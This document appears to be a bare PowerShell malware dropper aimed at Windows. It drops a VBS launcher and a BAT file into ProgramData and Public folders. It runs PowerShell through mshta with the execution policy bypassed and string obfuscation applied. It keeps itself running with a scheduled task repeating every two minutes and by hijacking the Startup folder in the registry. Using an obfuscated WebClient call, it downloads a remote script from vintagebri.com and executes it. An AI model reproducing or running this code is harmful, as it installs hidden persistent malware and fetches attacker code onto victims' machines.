Function WoRk
start-sleep -s 2
[system.io.directory]::CreateDirectory("C:\ProgramData\WindowsHost\")
New-Item -Path C:\ProgramData\WindowsHost\StateWindow.vbs -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'set alosh = wscript.createobject("WScript.shell")' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'alosh.run """C:\Users\Public\WindowsState.bat"" ", 0, true' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs -Value 'Set alosh = Nothing' -Force
start-sleep -s 1
Get-Content -Path C:\ProgramData\WindowsHost\StateWindow.vbs
New-Item -Path C:\Users\Public\WindowsState.bat -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\Users\Public\WindowsState.bat -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\Users\Public\WindowsState.bat -Value 'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & ''C"+":"+"\"+"U"+"s"+"e"+"r"+"s"+"\"+"P"+"u"+"b"+"l"+"i"+"c"+"\statewindow.ps1''"", 0:close")' -Force
start-sleep -s 4
Get-Content -Path C:\Users\Public\WindowsState.bat
start-sleep -s 3
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\WindowsHost\StateWindow.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WindowsHost"
start-sleep -s 3
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost";
start-sleep -s 6
$DEV = 'C>><<<>><<<>>blic\'.Replace(">><<<>><<<>>",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://vintagebri.com/.1.txt', $DEV + 'statewindow.ps1')){
start-sleep -s 10
Start "C:\ProgramData\WindowsHost\StateWindow.vbs"
Start "C:\ProgramData\WindowsHost\StateWindow.vbs"
IEX WoRk